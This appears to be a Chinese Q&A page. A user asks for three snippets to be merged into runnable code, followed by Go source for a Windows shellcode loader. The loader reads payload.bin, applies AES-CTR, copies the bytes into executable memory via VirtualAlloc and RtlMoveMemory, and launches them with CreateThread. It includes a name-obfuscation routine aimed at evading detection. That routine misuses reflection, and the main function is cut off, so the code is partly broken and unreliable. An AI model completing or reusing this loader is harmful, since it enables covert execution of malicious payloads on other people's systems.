将下面三段代码整理成可以运行的一段代码,并给出整理后的代码
package main
import ( "crypto/aes" "crypto/cipher" "encoding/base64" "io/ioutil" "reflect" "strconv" "syscall" "time" "unsafe" )
const ( MEM_COMMIT = 0x1000 MEM_RESERVE = 0x2000 PAGE_EXECUTE_READWRITE = 0x40 )
var ( kernel32 = syscall.NewLazyDLL("kernel32.dll") ntdll = syscall.NewLazyDLL("ntdll.dll") VirtualAlloc = kernel32.NewProc("VirtualAlloc") RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") CreateThread = kernel32.NewProc("CreateThread") )
var var0 = []byte{ 0x13, 0x54, 077, 0x1A, 0xA1, 0x3F, 0x04, 0x8B, 0x13, 0x54, 0x77, 0x69, 0x97, 0x3F, 0x33, 0x2B, 0x31, 0x23, 0x37, 0x19, 0x91, 0x3F, 0x50, 0x9B, }
type CipherFunc func(key []byte, src []byte) []byte
func func0(key []byte, src []byte) []byte { block, _ := aes.NewCipher(key) iv := make([]byte, aes.BlockSize) stream := cipher.NewCTR(block, iv) dst := make([]byte, len(src)) stream.XORKeyStream(dst, src) return dst }
func Crypt(cipher CipherFunc, key []byte, src []byte) []byte { return cipher(key, src) }
func Encode(src string) string { payloadBytes := []byte(src) encodedBytes := Crypt(func0, var0, payloadBytes) bdata := base64.StdEncoding.EncodeToString(encodedBytes) return bdata }
func Decode(src string) []byte { decodedBytes, _ := base64.StdEncoding.DecodeString(src) payloadBytes := Crypt(func0, var0, decodedBytes) return payloadBytes }
var func1 = func(charcode []byte) { addr, _, _ := VirtualAlloc.Call(0, uintptr(len(charcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) time.Sleep(5) _, _, _ = RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&charcode[0])), uintptr(len(charcode))) time.Sleep(5) handle, _, _ := CreateThread.Call(0, 0, addr, 0, 0, 0) time.Sleep(5) syscall.WaitForSingleObject(syscall.Handle(handle), syscall.INFINITE) }
var var1 = []string{"filename", "data"}
var var2 = []string{"payload", "encodedPayload", "shellCodeHex"}
var func2 = func() { funcNames := []string{"func0", "Crypt", "Encode", "Decode", "func1", "readFile", "main"} varNames := [][]string{ {"var0", "key", "src", "block", "iv", "stream", "dst"}, {"cipher", "key", "src"}, {"src", "payloadBytes", "encodedBytes", "bdata"}, {"src", "decodedBytes", "payloadBytes"}, {"charcode", "addr", "handle"}, var1, var2, }
for i, name := range funcNames {
newName := "func" + strconv.Itoa(i)
reflect.ValueOf(&main).Elem().FieldByName(name).Set(reflect.ValueOf(newName))
}
for _, vars := range varNames {
for i, name := range vars {
newName := "var" + strconv.Itoa(i)
reflect.ValueOf(&main).Elem().FieldByName(name).Set(reflect.ValueOf(newName))
}
}
}
func readFile(filename string) []byte { data, _ := ioutil.ReadFile(filename) return data }
func main() { func2() payload := string(readFile("./payload.bin")) encodedPayload := Encode(payload) shellCodeHex := Decode(encodedPayload) func1(shellCodeHex)
原文地址: https://www.cveoy.top/t/topic/lKGr 著作权归作者所有。请勿转载和采集!